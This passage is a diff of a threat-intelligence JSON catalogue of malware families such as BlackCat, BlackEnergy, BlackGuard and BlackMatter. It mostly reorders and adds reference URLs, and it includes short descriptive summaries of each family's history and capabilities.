"https://securelist.com/modern-ransomware-groups-ttps/106824/", + "https://killingthebear.jorgetesta.tech/actors/alphv", + "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments", + "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/", + "https://unit42.paloaltonetworks.com/blackcat-ransomware/", "https://www.intrinsec.com/alphv-ransomware-gang-analysis", + "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html", + "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022", + "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/", + "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor", "https://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware", "https://id-ransomware.blogspot.com/2021/12/blackcat-ransomware.html", - "https://www.intrinsec.com/alphv-ransomware-gang-analysis/", - "https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3", - "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", - "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments", - "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html", - "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf", - "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809", - "https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive", - "https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/", - "https://www.varonis.com/blog/alphv-blackcat-ransomware", - "https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/", - "https://securelist.com/a-bad-luck-blackcat/106254/", - "https://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/", "https://go.kaspersky.com/rs/802-IJN-240/images/TR_BlackCat_Report.pdf", - "https://www.ic3.gov/Media/News/2022/220420.pdf", - "https://www.mandiant.com/resources/blog/alphv-ransomware-backup", - "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html", + "https://mssplab.github.io/threat-hunting/2023/07/13/malware-analysis-blackcat.html", + "https://securityscorecard.com/blog/ttps-associated-with-new-version-of-blackcat-ransomware", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html", + "https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/", "https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", - "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", - "https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack", + "https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous", + "https://www.crowdstrike.com/blog/falcon-overwatch-contributes-to-blackcat-protection/", "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", - "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", + "https://www.netskope.com/blog/blackcat-ransomware-tactics-and-techniques-from-a-targeted-attack", + "https://www.mandiant.com/resources/blog/alphv-ransomware-backup", + "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware", + "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", + "https://www.intrinsec.com/alphv-ransomware-gang-analysis/", + "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", + "https://community.riskiq.com/article/47766fbd", + "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group", + "https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3", + "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", "https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/", - "https://www.trendmicro.com/vinfo/us/security/news/ransomware-by-the-numbers/lockbit-conti-and-blackcat-lead-pack-amid-rise-in-active-raas-and-extortion-groups-ransomware-in-q1-2022", - "https://unit42.paloaltonetworks.com/blackcat-ransomware/", "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html", - "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf", - "https://community.riskiq.com/article/47766fbd", - "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/", - "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/", - "https://securityscorecard.com/blog/ttps-associated-with-new-version-of-blackcat-ransomware", - "https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/", - "https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/", - "https://securelist.com/modern-ransomware-groups-ttps/106824/", - "https://www.trendmicro.com/en_us/research/22/d/an-investigation-of-the-blackcat-ransomware.html", - "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-alphv-rust-ransomware", - "https://blog.group-ib.com/blackcat", - "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v", - "https://killingthebear.jorgetesta.tech/actors/alphv", + "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html", + "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809", + "https://www.microsoft.com/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/", + "https://securelist.com/a-bad-luck-blackcat/106254/", + "https://www.ic3.gov/Media/News/2022/220420.pdf", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps", - "https://github.com/f0wl/blackCatConf", - "https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous" + "https://www.advintel.io/post/discontinued-the-end-of-conti-s-brand-marks-new-chapter-for-cybercrime-landscape", + "https://www.sentinelone.com/labs/crimeware-trends-ransomware-developers-turn-to-intermittent-encryption-to-evade-detection/", + "https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html", + "https://documents.trendmicro.com/assets/pdf/datasheet-ransomware-in-Q1-2022.pdf", + "https://therecord.media/german-wind-farm-operator-confirms-cybersecurity-incident-after-ransomware-group/", + "https://github.com/f0wl/blackCatConf" ], "synonyms": [ "ALPHV", @@ -15582,19 +16293,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackcoffee", - "https://intrusiontruth.wordpress.com/2019/07/24/apt17-is-run-by-the-jinan-bureau-of-the-chinese-ministry-of-state-security/", - "https://attack.mitre.org/groups/G0096", - "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", - "https://www.secureworks.com/research/threat-profiles/bronze-keystone", - "https://www.youtube.com/watch?v=NFJqD-LcpIg", - "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1", "http://www.novetta.com/wp-content/uploads/2014/11/ZoxPNG.pdf", + "https://attack.mitre.org/groups/G0025/", + "https://attack.mitre.org/groups/G0096", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", + "https://attack.mitre.org/groups/G0001/", + "https://intrusiontruth.wordpress.com/2019/07/24/apt17-is-run-by-the-jinan-bureau-of-the-chinese-ministry-of-state-security/", + "https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html", + "https://www.secureworks.com/research/threat-profiles/bronze-mohawk", "https://attack.mitre.org/software/S0069/", "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf", - "https://attack.mitre.org/groups/G0001/", - "https://attack.mitre.org/groups/G0025/", - "https://www.secureworks.com/research/threat-profiles/bronze-mohawk" + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "http://malware-log.hatenablog.com/entry/2015/05/18/000000_1", + "https://www.youtube.com/watch?v=NFJqD-LcpIg" ], "synonyms": [ "PNGRAT", @@ -15607,36 +16318,36 @@ "value": "BLACKCOFFEE" }, { - "description": "BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.\r\n\r\nVersion 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to\r\n- download and execute a remote file;\r\n- execute a local file on the infected computer;\r\n- update the bot and its plugins;\r\n\r\nThe Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.\r\n\r\nIn 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included:\r\n- operations with victim's filesystem\r\n- spreading with a parasitic infector\r\n- spying features like keylogging, screenshoots or a robust password stealer\r\n- Team viewer and a simple pseudo “remote desktop”\r\n- listing Windows accounts and scanning network \r\n- destroying the system\r\n\r\nTypical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.\r\n\r\nOn 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.", + "description": "BlackEnergy, its first version shortened as BE1, started as a crimeware being sold in the Russian cyber underground as early as 2007. Initially, it was designed as a toolkit for creating botnets for conducting DDoS attacks. It supported a variety of flooding commands including protocols like ICMP, TCP SYN, UDP, HTTP and DNS. Among the high profile targets of cyber attacks utilising BE1 were a Norwegian bank and government websites in Georgia three weeks before Russo-Georgian War.\r\n\r\nVersion 2 of BlackEnergy, BE2, came in 2008 with a complete code rewrite that introduced a protective layer, a kernel-mode rootkit and a modular architecture. Plugins included mostly DDoS attacks, a spam plugin and two banking authentication plugins to steal from Russian nad Ukrainian banks. The banking plugin was paired with a module designed to destroy the filesystem. Moreover, BE2 was able to\r\n- download and execute a remote file;\r\n- execute a local file on the infected computer;\r\n- update the bot and its plugins;\r\n\r\nThe Industrial Control Systems Cyber Emergency Response Team issued an alert warning that BE2 was leveraging the human-machine interfaces of industrial control systems like GE CIMPLICITY, Advantech/Broadwin WebAccess, and Siemens WinCC to gain access to critical infrastructure networks.\r\n\r\nIn 2014, the BlackEnergy toolkit, BE3, switched to a lighter footprint with no kernel-mode driver component. Its plugins included:\r\n- operations with victim's filesystem\r\n- spreading with a parasitic infector\r\n- spying features like keylogging, screenshoots or a robust password stealer\r\n- Team viewer and a simple pseudo \u201cremote desktop\u201d\r\n- listing Windows accounts and scanning network \r\n- destroying the system\r\n\r\nTypical for distribution of BE3 was heavy use of spear-phishing emails containing Microsoft Word or Excel documents with a malicious VBA macro, Rich Text Format (RTF) documents embedding exploits or a PowerPoint presentation with zero-day exploit CVE-2014-4114.\r\n\r\nOn 23 December 2015, attackers behind the BlackEnergy malware successfully caused power outages for several hours in different regions of Ukraine. This cyber sabotage against three energy companies has been confirmed by the Ukrainian government. The power grid compromise has become known as the first-of-its-kind cyber warfare attack affecting civilians.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackenergy", - "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", - "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Cherepanov-Lipovsky.pdf", - "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf", - "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", - "https://securelist.com/black-ddos/36309/", - "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", - "https://www.secureworks.com/research/threat-profiles/iron-viking", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", - "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", - "https://attack.mitre.org/groups/G0034", - "http://pds15.egloos.com/pds/201001/01/66/BlackEnergy_DDoS_Bot_Analysis.pdf", - "https://threatconnect.com/blog/casting-a-light-on-blackenergy/", - "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", - "https://web.archive.org/web/20140428201836/http://www.fireeye.com/blog/technical/malware-research/2010/03/black-energy-crypto.html", - "https://marcusedmondson.com/2019/01/18/black-energy-analysis/", "https://www.gov.uk/government/news/uk-exposes-series-of-russian-cyber-attacks-against-olympic-and-paralympic-games", - "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", - "https://www.secureworks.com/research/blackenergy2", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", - "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/", - "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", - "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf", - "http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf", + "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", "https://www.welivesecurity.com/2014/10/14/cve-2014-4114-details-august-blackenergy-powerpoint-campaigns/", - "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf" + "https://www.riskint.blog/post/revisited-fancy-bear-s-new-faces-and-sandworms-too", + "http://pds15.egloos.com/pds/201001/01/66/BlackEnergy_DDoS_Bot_Analysis.pdf", + "https://www.secureworks.com/research/threat-profiles/iron-viking", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-0909.pdf", + "https://www.secureworks.com/research/blackenergy2", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", + "https://securelist.com/black-ddos/36309/", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", + "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html", + "https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf", + "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", + "https://threatconnect.com/blog/casting-a-light-on-blackenergy/", + "https://www.virusbulletin.com/uploads/pdf/magazine/2016/VB2016-Cherepanov-Lipovsky.pdf", + "https://attack.mitre.org/groups/G0034", + "http://atlas-public.ec2.arbor.net/docs/BlackEnergy+DDoS+Bot+Analysis.pdf", + "https://securelist.com/be2-extraordinary-plugins-siemens-targeting-dev-fails/68838/", + "https://securelist.com/blackenergy-apt-attacks-in-ukraine-employ-spearphishing-with-word-documents/73440/", + "https://www.tesorion.nl/en/resources/pdfstore/Report-OSINT-Russia-Ukraine-Conflict-Cyberaspect.pdf", + "https://securelist.com/be2-custom-plugins-router-abuse-and-target-profiles/67353/", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://web.archive.org/web/20140428201836/http://www.fireeye.com/blog/technical/malware-research/2010/03/black-energy-crypto.html", + "https://marcusedmondson.com/2019/01/18/black-energy-analysis/" ], "synonyms": [], "type": [] @@ -15649,20 +16360,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackguard", + "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/", + "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/", + "https://www.f5.com/labs/articles/threat-intelligence/blackguard-infostealer-malware-dissecting-the-state-of-exfiltrated-data", + "https://cyberint.com/blog/research/blackguard-stealer/", + "https://www.youtube.com/watch?v=Fd8WjxzY2_g", + "https://www.zdnet.com/article/meet-blackguard-a-new-infostealer-peddled-on-russian-hacker-forums/", + "https://thehackernews.com/2022/04/experts-shed-light-on-blackguard.html", + "https://medium.com/s2wblog/rising-stealer-in-q1-2022-blackguard-stealer-f516d9f85ee5", "https://blogs.blackberry.com/en/2022/04/threat-thursday-blackguard-infostealer", "https://ke-la.com/information-stealers-a-new-landscape/", - "https://www.zdnet.com/article/meet-blackguard-a-new-infostealer-peddled-on-russian-hacker-forums/", - "https://medium.com/s2wblog/rising-stealer-in-q1-2022-blackguard-stealer-f516d9f85ee5", - "https://thehackernews.com/2022/04/experts-shed-light-on-blackguard.html", "https://www.zscaler.com/blogs/security-research/analysis-blackguard-new-info-stealer-malware-being-sold-russian-hacking", + "https://medium.com/s2wblog/the-history-of-blackguard-stealer-86207e72ffb4", "https://blog.cyble.com/2022/04/01/dissecting-blackguard-info-stealer/", "https://www.bleepingcomputer.com/news/security/new-blackguard-password-stealing-malware-sold-on-hacker-forums/", - "https://www.bleepingcomputer.com/news/security/new-meta-information-stealer-distributed-in-malspam-campaign/", - "https://www.youtube.com/watch?v=Fd8WjxzY2_g", - "https://cyberint.com/blog/research/blackguard-stealer/", - "https://www.f5.com/labs/articles/threat-intelligence/blackguard-infostealer-malware-dissecting-the-state-of-exfiltrated-data", - "https://medium.com/s2wblog/the-history-of-blackguard-stealer-86207e72ffb4", - "https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/", "https://www.techtimes.com/articles/273752/20220331/new-password-stealing-malware-hacking-forum-hack-password-stealing-google-chrome-binance-outlook-telegram.htm" ], "synonyms": [], @@ -15676,13 +16387,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackkingdom_ransomware", + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://news.sophos.com/en-us/2021/03/23/black-kingdom/", + "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html", "https://id-ransomware.blogspot.com/2020/02/blackkingdom-ransomware.html", - "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities", - "https://news.sophos.com/en-us/2021/03/23/black-kingdom/", - "https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html", "https://securelist.com/black-kingdom-ransomware/102873/", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/" + "https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html" ], "synonyms": [], "type": [] @@ -15695,9 +16406,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blacklotus", - "https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/", "https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/", - "https://www.binarly.io/posts/The_Untold_Story_of_the_BlackLotus_UEFI_Bootkit/index.html" + "https://mssplab.github.io/threat-hunting/2023/07/15/malware-src-blacklotus.html", + "https://kn0s-organization.gitbook.io/blacklotus-analysis-stage2-bootkit-rootkit-stage/", + "https://www.binarly.io/posts/The_Untold_Story_of_the_BlackLotus_UEFI_Bootkit/index.html", + "https://www.welivesecurity.com/2023/03/01/blacklotus-uefi-bootkit-myth-confirmed/" ], "synonyms": [], "type": [] @@ -15719,65 +16432,65 @@ "value": "BlackMagic" }, { - "description": "Ransomware-as-a-Service ", + "description": "According to PCrisk, BlackMatter is a piece of malicious software categorized as ransomware. It operates by encrypting data for the purpose of making ransom demands for the decryption tools. In other words, files affected by BlackMatter are rendered inaccessible, and victims are asked to pay - to recover access to their data.\r\n\r\nDuring the encryption process, files are appended with an extension consisting of a random character string. For example, a file initially named \"1.jpg\" would appear as something similar to \"1.jpg.k5RO9fVOl\". After this process is complete, the ransomware changes the desktop wallpaper and created a ransom note - \"[random_string].README.txt\" (e.g., k5RO9fVOl.README.txt).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.blackmatter", - "https://chuongdong.com/reverse%20engineering/2021/09/05/BlackMatterRansomware/", - "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2", - "https://blog.digital-investigations.info/2021-08-05-understanding-blackmatters-api-hashing.html", - "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf", "https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html", - "https://medium.com/s2wblog/blackcat-new-rust-based-ransomware-borrowing-blackmatters-configuration-31c8d330a809", - "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/", - "https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d", - "https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html", - "https://go.recordedfuture.com/hubfs/reports/MTP-2021-0804.pdf", - "https://us-cert.cisa.gov/ncas/alerts/aa21-291a", - "https://www.mandiant.com/resources/cryptography-blackmatter-ransomware", - "https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf", - "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf", - "https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.nozominetworks.com/blog/blackmatter-ransomware-technical-analysis-and-tools-from-nozomi-networks-labs/", - "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/", - "https://www.varonis.com/blog/blackmatter-ransomware/", - "https://therecord.media/blackmatter-ransomware-says-its-shutting-down-due-to-pressure-from-local-authorities/", - "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself", - "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html", - "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/", - "https://www.mcafee.com/blogs/enterprise/blackmatter-ransomware-analysis-the-dark-side-returns/", - "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/", - "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", - "https://twitter.com/GelosSnake/status/1451465959894667275", - "https://blog.group-ib.com/blackmatter#", "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf", - "https://www.glimps.fr/lockbit3-0/", - "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/", - "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf", - "https://www.mandiant.com/resources/chasing-avaddon-ransomware", - "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration", - "https://blog.group-ib.com/blackmatter2", - "https://www.ciphertechsolutions.com/rapidly-evolving-blackmatter-ransomware-tactics/", - "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service", - "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", - "https://www.netskope.com/blog/netskope-threat-coverage-blackmatter", - "https://www.youtube.com/watch?v=NIiEcOryLpI", - "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/", - "https://services.google.com/fh/files/misc/gcat_threathorizons_full_nov2021.pdf", - "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/", - "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", - "https://www.tesorion.nl/en/posts/analysis-of-the-blackmatter-ransomware/", - "https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf", - "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/noberus-blackcat-ransomware-ttps", - "https://blog.minerva-labs.com/blackmatter", - "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group", "https://assets.virustotal.com/reports/2021trends.pdf", - "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/" + "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", + "https://blog.digital-investigations.info/2021-08-05-understanding-blackmatters-api-hashing.html", + "https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/", + "https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/", + "https://www.splunk.com/en_us/blog/security/gone-in-52-seconds-and-42-minutes-a-comparative-analysis-of-ransomware-encryption-speed.html", + "https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/", + "https://us-cert.cisa.gov/ncas/alerts/aa21-291a", + "https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html", + "https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/", + "https://twitter.com/GelosSnake/status/1451465959894667275", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackmatter-data-exfiltration", + "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", + "https://ke-la.com/the-ideal-ransomware-victim-what-attackers-are-looking-for/", + "https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/", + "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/", + "https://www.mcafee.com/blogs/enterprise/blackmatter-ransomware-analysis-the-dark-side-returns/", + "https://blog.minerva-labs.com/blackmatter", + "https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2", + "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/", + "https://blog.group-ib.com/blackmatter#", + "https://blog.group-ib.com/blackmatter2", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.varonis.com/blog/blackmatter-ransomware/", + "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/", + "https://chuongdong.com/reverse%20engineering/2021/09/05/BlackMatterRansomware/", + 